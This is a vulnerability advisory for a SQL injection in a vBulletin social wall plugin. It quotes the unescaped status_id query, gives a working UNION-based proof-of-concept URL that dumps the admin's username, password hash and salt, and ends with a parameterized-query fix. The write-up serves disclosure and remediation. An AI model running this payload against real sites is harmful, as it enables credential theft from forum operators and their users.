vBulletin vBSocial.com Wall Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294260
Version: <= 2.5 (latest)

The vulnerability resides in the misc_start hook and the /includes/class_statusbit.php file:

	public function process_fetch_status_item($status_id)
	{
		global $vbulletin;
		// $status_id goes into the query string unescaped
		$status_item = $vbulletin->db->query_first("SELECT * FROM ".TABLE_PREFIX."status WHERE id='$status_id'");
		if ($status_item)
		{
			$status_item['message'] = htmlspecialchars_uni($status_item['message']);
			$status_item['message'] = smartConvertPost($status_item['message']); // parse image links
			$status_item['message'] = parse_youtubelinks($status_item['message']); // parse youtube video links
			$status_item['message'] = nl2br(trim(fetch_censored_text($status_item['message'])));

			if ($status_item['type'] == 'poll'){
				$poll_get = $vbulletin->db->query_read("SELECT * FROM ".TABLE_PREFIX."status_poll WHERE statusid='".$status_item['id']."'");
				if ($vbulletin->db->num_rows($poll_get) > 0){
					$i = 0;
					while ($poll_item = $vbulletin->db->fetch_array($poll_get)){
						$i ++;
						$status_item['message'] .= '
';
					}
				}
			}
			return $status_item['message'];
		}
	}

User-supplied input (the status_id request parameter) is passed to these functions and placed directly into the SQL query without being sanitized or checked.

Proof of concept:
http://example.com/misc.php?do=ln_fetch_status_item&status_id=11' UNION SELECT null, concat(username, 0x3a, password, 0x3a, salt), null, null, null, null, null, null, null, null, null, null, null FROM user WHERE userid = '1

This will display the username, password and salt of the user with id 1 in the database.
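One way to close the hole described above, shown as an added example that is not the plugin's code: accept status_id only as a positive integer and bind it as a query parameter. It runs stand-alone against an in-memory SQLite database through PDO; the function name `fetch_status_item`, the table layout and the sample rows are constructed for illustration.

```php
<?php
// Added example, not the plugin's code. Table layout and rows are constructed.

function fetch_status_item(PDO $db, $status_id): ?array
{
    // Accept only a positive decimal integer; anything else never reaches SQL.
    $id = filter_var($status_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Bind the value instead of concatenating it into the query text.
    $stmt = $db->prepare('SELECT id, message, type FROM status WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed test database standing in for the plugin's status table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE status (id INTEGER PRIMARY KEY, message TEXT, type TEXT)");
$db->exec("INSERT INTO status (id, message, type) VALUES (11, 'hello wall', 'text')");

// Constructed inputs: one valid id, then values that must be rejected,
// including one with the quote-then-UNION shape of the proof of concept.
$inputs = ['11', "11' UNION SELECT null", '11 OR 1=1', '-1', ''];

foreach ($inputs as $in) {
    $row = fetch_status_item($db, $in);
    printf("%-26s => %s\n", var_export($in, true), $row ? $row['message'] : 'rejected');
}
```

Only the first input returns a row; the others are rejected before any query is prepared. Inside vBulletin the same integer-only rule can be applied by cleaning the parameter with `clean_gpc` and `TYPE_UINT`, or with `intval()`, before the query is built.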
